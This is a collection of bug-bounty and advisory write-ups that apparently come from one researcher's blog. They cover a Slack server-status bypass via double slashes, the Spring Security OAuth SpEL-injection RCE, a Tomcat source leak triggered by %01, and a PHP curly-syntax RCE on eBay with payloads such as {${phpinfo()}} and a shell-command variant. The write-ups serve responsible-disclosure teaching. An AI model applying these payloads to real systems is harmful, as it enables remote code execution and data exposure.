In fact, it is a low-risk issue, but in my opinion, it can be used as an "eye-catcher" in your Security Awareness campaign.


I want to thank the private bug bounty programs for the bounties and thus the opportunity to donate them to people in need who well deserve our help.


Slack, a brief journey to mission control

Oct, 20th 2016


In this blog post, I will describe my thoughts while hunting for security issues as part of Slack's bug bounty program which resulted in the findings of and

Thanks to the Slack security team

I want to thank Leigh Honeywell and Max Feldman of the Slack security team for the gentle, professional communication and coordination in the bug reporting process.

Information gathering

To understand the infrastructure and gain information about the used framework, I started to check the HTTP response header. I saw that Slack is using an Apache httpd server. So I tried to identify common Apache directories and directives like /icons/README, /manual/, /server-info and /server-status.

May I access your internal data, please?

Slack runs mod_status on the web server. The status module allows a server administrator to find out how well the server is performing and which resources have been requested from which IP addresses. An attacker may use this information to craft an attack against the web server.

When I tried to access the server-status page, the server redirected me to a login page located on the * domain. So this path was protected.

Out of scope domain! Now what?

If you are lazy, be warned that brute force is not permitted by the rules of Slack's bug bounty program. One would now try to bypass the login page with some injection techniques, but unfortunately, the login page itself is located on an FQDN outside the allowed scope, so this was not an option. I had to find a way to stay within the allowed scope of

Routing? Filter? - Blind testing

First of all, I thought that if they were using Apache httpd and mod_status, the redirect could be triggered by the rewrite module. The mod_rewrite module is a powerful Apache module for rewriting URLs on the fly. However, with such power come associated risks; it is easy to make mistakes when configuring mod_rewrite, which can turn into security issues. Take, for example, one of the configurations in the mod_rewrite documentation:

RewriteRule ^/somepath(.*) /otherpath$1 [R]
If this is the case, they could have misconfigured the RewriteRule, and I could bypass it by simply adding a slash. Why? Requesting
will redirect and return the page http://yourserver/otherpath/secalert as expected. However, requesting
will bypass this particular RewriteRule. In the case of Slack, it was not possible to bypass it this way, so I had to think outside the box.

I played around with representations of a slash in order to potentially bypass a simple string-based filter protection.
I also played with the RTLO sequence, trying to bypass the filter by submitting the RTLO sequence followed by the reversed string:{U+202E here}sutats-revres
which did not work at first.

Access control bypass!

After a few tests, I thought that they might use a route map in their framework and that I could potentially bypass the routing mechanism or access control by adding multiple forward slashes: if the applied filter checks whether the string starts with a particular string and strips a single leading slash, but misses stripping all slashes recursively, the check can be evaded. This finally worked.
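A sketch of the kind of filter flaw I suspected (the path names and logic are illustrative; Slack's actual code is unknown to me):

```python
def is_protected(path):
    # Hypothetical access filter: strips ONE leading slash,
    # then checks whether the route is on the protected list.
    if path.startswith("/"):
        path = path[1:]              # bug: not applied recursively
    return path.startswith("server-status")

def route(path):
    # Routers typically collapse duplicate slashes before dispatching.
    while "//" in path:
        path = path.replace("//", "/")
    return path

assert is_protected("/server-status")        # normal request: login required
assert not is_protected("//server-status")   # filter misses the double slash
assert route("//server-status") == "/server-status"  # router still serves the page
```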

Bounty as low as $50?

While writing the report for Slack on HackerOne, I decided to add some screenshots as proof of concept. At this point, I thought that I would earn the minimum bounty of $50 for reporting this misconfiguration, because the server-status page usually would not expose any sensitive information to me if the requested resources were part of my own Slack workspace, right? Well, I logged out of my Slack account and requested the server status without being logged in! That means an attacker could potentially gain unauthorized access to the requested resources of ANY Slack site by accessing the server-status page of a given workspace!

Secrets exposed, increased bounty!

I realised that some of the listed requests, like /callbacks/chat.php?secret=... and /users.list?token=..., definitely contained sensitive data. So I added some screenshots, which most probably increased the bounty I finally received. Thanks again to Slack for that generous bounty.

Google indexing

After receiving the first generous bounty from Slack, I was motivated to hunt for further issues. I googled for common file extensions on the Slack websites and found cached URLs, which indicated that Slack has or had a back-end admin panel that Google indexed in the past. When I tried to access these pages, I was redirected to the login page once again. But since Slack had resolved the previously reported issue, chances were low, right?

Backend access -> second bounty!

Slack employees have access to a back-end admin panel called mission control. In the mission control panel, authorized people can read lots of metadata related to Slack users and workspaces by passing an id to the corresponding controller. Since the needed "id" is exposed in the rendered HTML of my Slack workspace, I read the metadata associated with my own account and sent these screenshots to the Slack security team. Besides that, I identified that an attacker would be able to reset the password of any user by guessing their "id" and passing a request to the associated reset controller in the mission control panel. This would allow an attacker to take over any account! For this issue, I received an additional bounty.


Be patient! Sometimes you may identify a flaw that seems trivial from a technical point of view but has a high business impact or raises a data privacy issue for the affected company, so they may rate the risk differently than you initially thought.

Apr, 11th 2016: issue identified and reported
        Apr, 11th 2016: verified by Slack
        Apr, 13th 2016: issue fixed
        Apr, 13th 2016: received a bounty of $2000 for
        Apr, 14th 2016: identified and reported second issue
        Apr, 14th 2016: issue verified by Slack
        Apr, 24th 2016: issue has been globally fixed
        Apr, 24th 2016: additional bounty of $7000 for
        Oct, 20th 2016: this write-up has been published

CVE-2016-4977: RCE in Spring Security OAuth 1&2

Oct, 13th 2016

Affected versions

  • Pivotal Spring Security OAuth 2.0 - 2.0.9
  • Pivotal Spring Security OAuth 1.0 - 1.0.5


A couple of months ago, I performed a security audit of a web application that used the Spring Security OAuth framework for authorization. During my research, I identified several issues, including remote code execution flaws. The web application implemented the Spring Security OAuth framework, which by default ships with a template prone to RCE! One would believe it is secure by default, but indeed it was not. During my research, I realized that a couple of well-known websites also implemented the vulnerable code.

Spring Boot Demo

If you want to verify the issue yourself, you can download the spring boot demo application as a maven project from

Let's get started

Usually one would run the demo application by passing a legit request like:

Everything works as intended. I then started to look for common issues like XSS:

This led to an error which showed the Whitelabel Error Page. Surprisingly, many well-known websites still use the Whitelabel Error Page instead of configuring a custom error page. The Spring Security OAuth example shows the Whitelabel Error Page by default whenever an error occurs. The Whitelabel view reflects parts of the given parameter values, which at first glance leads to XSS. After finding the XSS during blackbox testing, I reviewed the source code to identify the vulnerable code before reporting the issue upstream. While reviewing the source code, I realised that a more dangerous issue was hiding there.

Error handling calls "SpelView" endpoint

Let's review the source code of

/* Lines 137-148 of: */
        private final SpelView defaultErrorView = new SpelView(
                "Whitelabel Error Page"
                + "This application has no explicit mapping for /error, so you are seeing this as a fallback."
                + "${timestamp}"
                + "There was an unexpected error (type=${error}, status=${status})."
                + "${message}");

        @Bean(name = "error")
        @ConditionalOnMissingBean(name = "error")
        public View defaultErrorView() {
                return this.defaultErrorView;
        }

The user-supplied values are passed to the SpelView class, which uses the SpelExpressionParser of oauth2/src/main/java/org/springframework/security/oauth2/provider/endpoint/

Source code: /spring-security-oauth2/src/main/java/org/springframework/security/oauth2/provider/endpoint/
        import org.springframework.expression.spel.standard.SpelExpressionParser;
        private final SpelExpressionParser parser = new SpelExpressionParser();
        private final StandardEvaluationContext context = new StandardEvaluationContext();
        this.helper = new PropertyPlaceholderHelper("${", "}");
        Expression expression = parser.parseExpression(name); ...

This is interesting. The Spring Expression Language (click here for details) is the syntax used by Spring for configuration and for code placed in annotations. To check whether the param is also prone to Spring Expression Language injection, I then passed:


The response message shows "666", which means that the proof-of-concept code has been evaluated!
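What happens conceptually can be simulated in a few lines. This is a Python stand-in for the SpEL resolver, using eval to mimic expression evaluation; the real flaw lives in Java, and the template text here is paraphrased:

```python
import re

def render(template, model):
    # Naive placeholder engine: resolve ${...} until none remain.
    # Unknown names fall through to expression evaluation,
    # just as SpelView hands them to parser.parseExpression(name).
    def resolve(match):
        name = match.group(1)
        if name in model:
            return str(model[name])
        return str(eval(name))  # stand-in for SpEL evaluation
    while "${" in template:
        template = re.sub(r"\$\{([^}]*)\}", resolve, template)
    return template

# The error view reflects the user-controlled message into the template:
template = "There was an unexpected error (type=${error}). ${message}"
out = render(template, {"error": "Bad Request", "message": "${2*333}"})
assert "666" in out
```

The second resolution pass is the bug: a reflected parameter value is itself treated as a placeholder and evaluated.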

Exploiting the RCE (on Linux)


Exploiting the RCE (on Windows)


The hotfix

The maintainer released a hotfix:

Race condition in the hotfix may be exploitable

If one reviews the applied bug fix, one may conclude that it looks like a partial fix. They try to prevent recursive placeholders in whitelabel views by using the RandomValueStringGenerator class to build a random prefix that temporarily replaces the "${" prefix.

    /* Source code: "": */
        public SpelView(String template) {
            this.template = template;
            this.prefix = new RandomValueStringGenerator().generate() + "{";
            this.context.addPropertyAccessor(new MapAccessor());
            this.resolver = new PlaceholderResolver() {
                public String resolvePlaceholder(String name) {
                    Expression expression = parser.parseExpression(name);
                    Object value = expression.getValue(context);
                    return value == null ? null : value.toString();
                }
            };
        }

        /* later, while rendering the view: */
        String maskedTemplate = template.replace("${", prefix);
        PropertyPlaceholderHelper helper = new PropertyPlaceholderHelper(prefix, "}");
        String result = helper.replacePlaceholders(maskedTemplate, resolver);
        result = result.replace(prefix, "${");
This looks like a quick-win solution, but if an attacker makes a sufficient number of requests, the RCE could still be exploitable due to a race condition, since the RandomValueStringGenerator class (click here for API docs) generates a string with the default length of 6.
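For context, the search space of that random prefix is large but finite. This is back-of-the-envelope math, assuming the generator's default six-character alphanumeric output (the alphabet size is my assumption):

```python
# Assumed alphabet: A-Z, a-z, 0-9 -> 62 symbols, default length 6.
alphabet_size = 62
length = 6
search_space = alphabet_size ** length
print(search_space)  # 56800235584 possible prefixes
```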

Whitelabel Error Page on production environment

As a web developer or web admin, you should consider disabling the whitelabel error page or using a custom error page with a generic text. Please refer to section 77.2, "Customize the whitelabel error page", on


Feb, 8th 2016: vulnerability discovered and reported to upstream
        Feb, 14th 2016: upstream verified the issue
        Mar, 12th 2016: upstream deployed a hotfix
        Jul, 5th 2016: initial vulnerability report published by upstream
        Oct, 13th 2016: this write-up has been published

A tale of an interesting source code leak

Mar, 27th 2016


Lately, while participating in bug bounty programs, I came across an interesting issue which was classified with the highest severity, yielding a potential bug bounty. Due to its terms, I am compelled not to disclose the name of the company.

Information gathering

I started with some information gathering and footprinting. I noticed that the files end with the ".jsp" extension, which often indicates Apache Tomcat. First, I reviewed the HTTP response headers to gain some information about the target system:

HTTP/1.1 200 OK
        Date: 16 Mar 2016 15:15:33 GMT

If the HTTP status code is followed by the Date response header in the second line, it usually means that the page is served by an Apache httpd web server. In this case, I assumed that an httpd runs in front of a Tomcat web server. If I was right, they were probably using some module to dispatch files between the httpd and the Tomcat server, which means I could potentially trick the routing into exposing the source code of any ".jsp" or ".inc" file by appending specific lower ASCII characters, depending on whether they were using a connector or a handler.

Connector, Handler, File Descriptor

1) The Apache Tomcat Connectors: If Apache httpd and Tomcat are configured to serve content from the same filing system location then care must be taken to ensure that httpd is not able to serve inappropriate content such as the contents of the WEB-INF directory or JSP source code. This could occur if the httpd DocumentRoot overlaps with a Tomcat Host's appBase or the docBase of any Context. It could also occur when using the httpd Alias directive with a Tomcat Host's appBase or the docBase of any Context.

2) Well, let's have a look on the Apache web server handler. A "handler" is an internal Apache representation of the action to be performed when a file is called. Generally, files have implicit handlers, based on the file type. Normally, all files are simply served by the server, but certain file types are "handled" separately. If you want to handle ".jsp" files you may for example use the Apache module "mod_mime" in order to associate the requested filename's extensions with the file's behavior (handlers and filters) and content (mime-type, language, character set and encoding).

What will the httpd do if you try to access file which is not explicitly associated with a handler or filter? Httpd will serve the file as plain text without further actions which means that we can potentially exploit this behaviour.


In the case of this particular target system, I knew from the information-gathering analysis that they were handling ".jsp" files, so I assumed that they were using an Apache httpd in the front and a Tomcat or similar web server in the back end of the architecture. So I tried to append a character to the file extension like this, hoping to force the system into uncaught exceptions and anomalous behaviour:
This, however, did not work as expected. I was expecting the system to expose a stack trace or to run into a web application firewall, but instead it came up with the following message:
        Problem accessing /password.jsp%00. Reason:
            The request contains an illegal URL
From several pentests performed in the past, I knew that the Apache httpd would usually strip the %00 and raise a message like this one:
        Not Found
        The requested URL /password.jsp was not found on this server.
Therefore, I assumed that the error message did not originate from the httpd but from a connector. From past pentests, I knew that some connectors showed unusual behaviour when lower ASCII characters were passed to them.

During my research on Tomcat connectors, I found that I might manipulate the routing of the data stream by using the SOH (start of heading, 0x01) transmission control character. The SOH character was designed to mark a non-data section of a data stream, i.e., the part of a stream containing addresses and other housekeeping data.

As I had been successful with this trick in the past against several modules such as mod_proxy_ajp and mod_jk, some Spring Boot implementations, and a few others, I tried:

What I assumed

In this case, I assumed the target system had the following implementation in place:
1) Send request to Apache httpd
        2) httpd uses its file handler/filter to pass the request to Tomcat for processing
        3) Tomcat uses its file handler to open the ".jsp" file because it treats
        the %01 as the start of a new header and not as part of the file extension
        4) Tomcat passes the content of the requested file to the httpd,
        which now has the content of the ".jsp" file with the requested extension ".jsp%01"
        5) httpd does not find the ".jsp%01" extension in its file
        handler's extension list and therefore decides to serve the file as plain text
        6) The same also works for ".inc" files on the target system
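The assumed dispatch logic can be sketched like this (entirely hypothetical file names and handler table, mirroring the steps above):

```python
import os

# Hypothetical front-end handler table of the httpd.
HANDLERS = {".jsp": "forward-to-tomcat", ".inc": "forward-to-tomcat"}

def frontend_serves(path):
    # httpd looks up the extension; unknown extensions fall back to plain text.
    _, ext = os.path.splitext(path)
    return HANDLERS.get(ext, "serve-as-plain-text")

assert frontend_serves("/password.jsp") == "forward-to-tomcat"
# With a trailing 0x01 the extension no longer matches the handler table,
# so the JSP source that Tomcat returned is served as plain text:
assert frontend_serves("/password.jsp\x01") == "serve-as-plain-text"
```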

PoC and reporting

I could potentially have gained access to the whole source code, but decided to access only a few ".jsp" and ".inc" files as a proof of concept. I then immediately reported this issue to the company, and within 3 hours they gave me feedback that they had verified the issue and triaged it with the highest severity. They then deployed a hotfix within 48 hours. Respect!

Web server handlers/filters/modules with similar issues in the past:
CVE-2007-1860: mod_jk double-decoding:
        IBM WebSphere:
        Netscape Web Server:
        Allaire JRun root directory disclosure:
        Apache httpd artificially long slash path directory listing vulnerability:[1-4096 slashes here]/admin/*
        BEA WebLogic directory traversal with %00, %2e, %2f and %5c:

My advisories and CVEs

Mar, 15th 2017


Some of you reached out to me and asked me for my CVEs. Here is a list of some of my security advisories and associated CVE numbers sorted by vulnerability type.

CVE-2016-4977  Remote Code Execution
CVE-2016-3109  Remote Code Execution
CVE-2011-0635  Remote Code Execution
CVE-2006-7055  Remote Code Execution
CVE-2006-5132  Remote Code Execution
CVE-2006-3793  Remote Code Execution
CVE-2006-3210  Remote Code Execution
CVE-2006-2881  Remote Code Execution
CVE-2006-2852  Remote Code Execution
CVE-2006-2681  Remote Code Execution
CVE-2006-2323  Remote Code Execution
CVE-2010-2339  SQL Injection
CVE-2008-6120  SQL Injection
CVE-2006-3770  SQL Injection
CVE-2006-5128  SQL Injection
CVE-2006-5132  SQL Injection
CVE-2006-3793  SQL Injection
CVE-2006-3210  SQL Injection
CVE-2006-5935  SQL Injection
CVE-2006-5798  SQL Injection
CVE-2006-7077  SQL Injection RCE using CCS

Dec, 13th 2013


Once again I have been hunting for security issues on eBay's websites. This time I've identified a controller which was prone to remote code execution due to a type-cast issue in combination with PHP's complex curly syntax. Since these techniques are less known and less discussed, I found them interesting enough to blog about. The vulnerable subdomain is the same one where I identified an exploitable SQL injection last year, which is located on .

Information gathering

A legit user request looked like:

One of the very first tests I perform against PHP web applications is to look for type-cast issues, because PHP is known to raise warnings or even errors when the value of a given param is an array rather than the string it is expected to be. So obviously my next step was to perform the above request using [] to submit the param as an array:[]=Dave&catidd=1

The web application served me the same response as for the prior request, which surprised me a bit. From my experience, I know that PHP has several ways to handle strings. For example, if a string is enclosed in double quotes, the PHP parser will allow code evaluation under certain circumstances.

PHP complex syntax

Well, if we use php's complex curly syntax we could possibly have some success. Never heard of complex syntax?

Let's give it a try:{${phpinfo()}}&catidd=1

PHP code evaluation circumstances

This had no success. So let's rethink which circumstances may lead to code evaluation in PHP.

Which of these is ebay using?

Since this was a blackbox test, I assumed that eBay was using preg_replace() for filtering bad words, combined with the eval() function afterwards, because of two observations I made:
1) they were using a spellchecker, and I have seen a bunch of spellcheckers in web apps working with the eval() function in the past
2) they were using some filter, which I guessed to be a blacklist of words being replaced with the preg_replace() function.

Blackbox analysis

For example, when I submitted my handle 'secalert', it was stripped, and the response of the search query returned 'sec'. So obviously they were filtering words like 'alert' from the user-supplied string, maybe in the hope of preventing XSS, which is a very bad idea! Still, the curly-syntax attempt didn't work. Okay, it seemed like they were not using user-supplied values within double quotes. So what could I do now?

PHP's internal string handling

How does php internally handle strings?

PHP complex syntax + http parameter pollution + array indexing

So let's try to submit an array rather than a string and try to echo the values of the param 'q' by accessing the array indices.[0]=Dave&q[1]=secalert&catidd=1

It worked. The search controller parsed the request, and I got the last instance as part of the result; in this particular case, it returned valid entries matching the keyword 'sec'.

My assumption

But why? As mentioned before, I assumed that eBay was using preg_replace() for filtering bad words and afterwards doing some eval() work with the returned values. What might happen here is that they try to enforce that user-supplied values are always of type string: if a value is not a string, they try to make a string out of it, i.e., they cast the values of the array into a string before doing the string comparison against the list of bad words.
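My assumption about the filter can be sketched like this; a purely speculative reconstruction, in Python rather than PHP, of the behaviour observed from the outside:

```python
def sanitize(value):
    # Suspected bad-word filter: only handles strings...
    if isinstance(value, str):
        return value.replace("alert", "")
    return value  # ...arrays/lists pass through unfiltered

# Observed from the outside: 'secalert' came back as 'sec'.
assert sanitize("secalert") == "sec"
# Submitting an array instead of a string would slip past the filter:
assert sanitize(["Dave", "secalert"]) == ["Dave", "secalert"]
```

If the unfiltered value is later cast to a string and fed into an eval()-style sink, the curly-syntax payload survives intact.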

Exploiting the RCE

Okay, good. But how can we exploit that? We put all of this together and submit an array with two indices containing arbitrary values; one of them is supplied in complex curly syntax to trick the parser:

?q[0]=Dave&q[1]=secalert{${phpinfo()}}&catidd=1
Success! Now let's verify this by submitting two more requests:

?q[0]=Dave&q[1]=secalert{${phpcredits()}}&catidd=1
?q[0]=Dave&q[1]=secalert{${ini_get_all()}}&catidd=1

Verified! We can evaluate arbitrary PHP code in the context of the eBay website.

From my point of view, that was enough to prove the existence of this vulnerability to the eBay security team, and I did not want to cause any harm. What could an evil hacker have done? He could, for example, have investigated further and tried things like {${`ls -al`}} or other OS commands, and he might have managed to compromise the whole webserver.
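The backtick operator mentioned above is PHP's shell-execution shorthand, equivalent to shell_exec(), which is why {${`ls -al`}} inside an eval()'d double-quoted string would have run an OS command. A harmless illustration of the operator on its own:

```php
<?php
// Backticks execute the enclosed string as a shell command and return
// its output, equivalent to shell_exec(). This requires shell_exec to
// be enabled in the PHP configuration.
$output = `echo hello from the shell`;
echo $output;   // prints "hello from the shell"
```

Combined with the complex-syntax trick, that operator turns the code-evaluation bug into full command execution on the webserver.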



December  6th, 2013: vulnerability discovered and reported to eBay
December  9th, 2013: eBay solved the issue and deployed a hotfix
December 13th, 2013: this write-up has been published


David Kurz